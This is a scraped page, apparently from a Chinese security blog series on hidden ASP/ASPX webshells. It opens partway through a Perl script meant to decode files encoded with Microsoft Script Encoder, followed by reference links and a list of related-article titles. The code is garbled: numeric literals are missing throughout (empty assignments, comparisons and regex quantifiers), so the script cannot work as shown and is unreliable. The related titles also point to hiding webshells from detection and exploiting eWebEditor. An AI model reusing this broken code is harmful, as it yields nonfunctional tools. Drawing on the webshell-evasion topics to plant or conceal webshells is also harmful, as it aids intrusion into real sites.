"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x7B","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x32","\x30","\x21","\x29","\x5B","\x38","\x33","\x3D","\x58","\x3A","\x35","\x65","\x39","\x5C","\x56","\x73",
"\x66","\x4E","\x45","\x6B","\x62","\x59","\x78","\x5E","\x7D","\x4A","\x6D","\x71","\x3C","\x60","\x3E","\x53",
"\xFF","\x42","\x27","\x48","\x72","\x75","\x31","\x37","\x4D","\x52","\x22","\x54","\x6A","\x47","\x64","\x2D",
"\x20","\x7F","\x2E","\x4C","\x5D","\x7E","\x6C","\x6F","\x79","\x74","\x43","\x26","\x76","\x25","\x24","\x2B",
"\x28","\x23","\x41","\x34","\x09","\x2A","\x44","\x3F","\x77","\x3B","\x55","\x69","\x61","\x63","\x50","\x67",
"\x51","\x49","\x4F","\x46","\x68","\x7C","\x36","\x70","\x6E","\x7A","\x2F","\x5F","\x4B","\x5A","\x2C","\x57"); @dectab2 = (
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x6E","\x0A","\x0B","\x0C","\x06","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x2D","\x75","\x52","\x60","\x71","\x5E","\x49","\x5C","\x62","\x7D","\x29","\x36","\x20","\x7C","\x7A","\x7F",
"\x6B","\x63","\x33","\x2B","\x68","\x51","\x66","\x76","\x31","\x64","\x54","\x43","\x3C","\x3A","\x3E","\x7E",
"\xFF","\x45","\x2C","\x2A","\x74","\x27","\x37","\x44","\x79","\x59","\x2F","\x6F","\x26","\x72","\x6A","\x39",
"\x7B","\x3F","\x38","\x77","\x67","\x53","\x47","\x34","\x78","\x5D","\x30","\x23","\x5A","\x5B","\x6C","\x48",
"\x55","\x70","\x69","\x2E","\x4C","\x21","\x24","\x4E","\x50","\x09","\x56","\x73","\x35","\x61","\x4B","\x58",
"\x3B","\x57","\x22","\x6D","\x4D","\x25","\x28","\x46","\x4A","\x32","\x41","\x3D","\x5F","\x4F","\x42","\x65"); $_ = join('', <>);
(m/\Q#@~^\E/ and $_ = $') or die "Start marker not found\n";
(m/\Q^#~@\E/ and $_ = $`) or die "End marker not found\n";
# We do not check leading checksum. Is trailing checksum always present?
(m/^[A-Za-z0-+\/]{}==/ and $_ = $') or die "No leading checksum\n";
(m/[A-Za-z0-+\/]{}==$/ and $_ = $`); # or die "No trailing checksum\n"; $pos = ; # decrypt encrypted block
$special = ; foreach (split //) {
if ($special) {
$special = ;
tr/&#!*$/\n\r<>@/;
}
elsif ($_ lt "\x80") { # encrypted?
if ($itab[$pos] == ) { $_ = $dectab0[ord($_)]; }
elsif ($itab[$pos] == ) { $_ = $dectab1[ord($_)]; }
elsif ($itab[$pos] == ) { $_ = $dectab2[ord($_)]; }
if ($_ eq "\xff") {
$special = ;
next;
}
}
print;
$pos = ($pos+)%;
}
Relevant Link:
http://dennisbabkin.com/screnc/
http://blog.csdn.net/prsniper/article/details/5447675
http://www.password-crackers.com/crack/scrdec.html
http://download.aprilgreendownload.com/lp7_750/query.php?q=vbscript+encoder+download&ti1=12767882&ti2=0&ti3=2016-01-12T08%3A12%3A46.786244%2B00%3A00
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/29670
0x2: UTF-7
Relevant Link:
http://www.xuebuyuan.com/1266585.html
Deformity ASP/ASPX Webshell、Webshell Hidden Learning的更多相关文章
- Deformity PHP Webshell、Webshell Hidden Learning
目录 . 引言 . webshell原理介绍 . webshell的常见类型以及变种方法 . webshell的检测原理以及检测工具 . webshell隐藏反检测对抗手段 0. 引言 本文旨在研究W ...
- Deformity JSP Webshell、Webshell Hidden Learning
catalogue . JSP基础语法 . JSP Lexer By Lua . Open Source Code Analyzers in Java . WEBSHELL Samples . she ...
- 各种隐藏 WebShell、创建、删除畸形目录、特殊文件名、黑帽SEO作弊(转自核大大)
其实这个问题,经常有朋友问我,我也都帮大家解决了…… 但是现在这些现象越来越严重,而且手法毒辣.隐蔽.变态,清除了又来了,删掉了又恢复了,最后直接找不到文件了,但是访问网站还在,急的各大管理员.站长抓 ...
- 云锁Linux服务器安全软件安装及防护webshell、CC、XSS跨站攻击设置
无论我们在使用电脑,还是使用VPS/服务器的时候,最为担心的就是服务器是否有安全问题,尤其是网站服务器再遭受攻击的时候如何得到防护.对于大 部分站长用户来说,我们可能只会使用基础的环境,如果真遇到问题 ...
- WAF——针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等
核心概念 WAF Web应用防火墙(Web Application Firewall),简称WAF. Web攻击 针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入.XSS跨站.Websh ...
- ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
这个编辑器按脚本分主要有4个版本,ASP/ASPX/PHP/JSP 每个版本都有可以利用的漏洞.判断网站是否使用了eWebEditor查看程序源代码,看看源码中是否存在类似”ewebeditor.as ...
- Nginx Installation、Configuration、Rreverse Proxy、Load Balancing Learning
目录 . Nginx简介 . Nginx安装部署 . Nginx安全配置 . Nginx反向代理实践 . Nginx负载均衡实践 1. Nginx简介 0x1: Nginx的基本特性 Nginx(&q ...
- URL重写及ASP.NET路由、Http处理模块、程序等
这段时间在学习ASP.NET路由.HTTP处理等内容,了解了一些,但又未完全弄懂,似是而非,不管如何,作一总结,供日后借鉴和修改. 一.IIS6和IIS7经典模式和集成模式 在IIS6及IIS7经典模 ...
- jQuery Ajax方法调用 Asp.Net WebService、WebMethod 的详细实例代码
将以下html存为ws.aspx <%@ Page Language="C#" AutoEventWireup="true" %> <scri ...
随机推荐
- Paxos变种和优化
分布式系统理论进阶 - Paxos变种和优化 引言 <分布式系统理论进阶 - Paxos>中我们了解了Basic Paxos.Multi Paxos的基本原理,但如果想把Paxos应用于工 ...
- 《深入理解Bootstrap》勘误
感谢大家 感谢大家仔细阅读本书,并给本书指出了那么多的错误,下次重印时,一定会修正. 勘误列表 ID 发行人 章节 原文 更新文 备注 1 剑衣清风(微博) 1.5选择器(p7) [att$=valu ...
- java: ant 脚本示例
<?xml version="1.0" encoding="UTF-8"?> <!--basedir是从build.xml所在的目录为基础算起 ...
- TinyFrame尾篇:整合Spring AOP实现用户认证
创建Manager用户验证表 这一篇主要讲解使用AOP对用户操作进行验证,如果通过验证,则继续执行,反之,则不能执行.其思想和上一篇完全一致. 由于需要用到用户认证,所以我们新建一个Manager实体 ...
- 理解Android虚拟机体系结构
1 什么是Dalvik虚拟机 Dalvik是Google公司自己设计用于Android平台的Java虚拟机,它是Android平台的重要组成部分,支持dex格式(Dalvik Executable)的 ...
- jQuery api 快速参考[转]
选择符 匹配 * 所有元素 #id 带有给定ID的元素 element 给定类型的所有元素,比如说html标签 .class 带有给定类的所有元素 a,b 匹配a或者匹配b的元素 a b 作为a后代的 ...
- OS存储器管理(二)
离散分配 分页(Paging),分段,段页式 一.分页 一个进程的物理地址可以是非连续的: 将物理内存分成固定大小的块,称为块(frame): 将逻辑内存分为同样大小的块,称为页(page): ...
- MongoDB数据库GroupBy查询使用Spring-data-mongondb的实现
以前用MongoDB数据库都是简单的查询,直接用Query就可以,最近项目中用到了分组查询,完全不一样.第一次遇到,搞了好几天终于有点那意思了. 先上代码: import java.math.BigD ...
- Shell脚本_位置参数和预定义参数
一.位置参数变量 1.输出两个输入参数之和 l1.sh 1 2 3 4 5 6 7 8 9 #!/bin/bash num1=$1 num2=$2 sum=$((num1+num2)) # ...
- 【BZOJ 4104】【Thu Summer Camp 2015】解密运算
http://www.lydsy.com/JudgeOnline/problem.php?id=4104 网上题解满天飞,我也懒得写了 #include<cstdio> #include& ...